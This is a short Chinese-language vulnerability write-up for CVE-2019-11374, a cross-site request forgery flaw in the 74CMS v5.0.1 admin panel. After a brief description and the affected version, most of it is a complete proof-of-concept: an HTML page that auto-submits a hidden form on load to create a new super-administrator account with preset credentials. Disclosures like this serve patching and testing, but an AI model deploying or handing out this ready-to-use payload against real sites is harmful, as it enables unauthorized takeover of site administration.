CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造 CSRF 漏洞
一、漏洞简介
在 74CMS v5.0.1 后台存在一个跨站请求伪造(CSRF) 漏洞,该漏洞 url: /index.php?m=admin&c=admin&a=add 攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。
二、漏洞影响
74CMS v5.0.1
三、复现过程
首先我们登录后台页面,并添加管理员,然后添加信息,用 burp_suite 抓包
当管理员登录后台后,点击攻击者发来的连接即可创建一个新的超级管理员账户
<!DOCTYPE html>
<html>
<head>
<title> CSRF </title>
<script type="text/javascript">
function exec1(){
document.getElementById('form1').submit();
}
</script>
</head>
<body onload="exec1();">
<form id="form1" action="https://www.0-sec.org.com/index.php?m=Admin&c=admin&a=add" method="POST">
<input type="hidden" name="username" value="admin688" />
<input type="hidden" name="email" value="111111111@qq.com" />
<input type="hidden" name="password" value="admin688" />
<input type="hidden" name="repassword" value="admin688" />
<input type="hidden" name="role_id" value="1" />
</form>
</body>
</html>如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论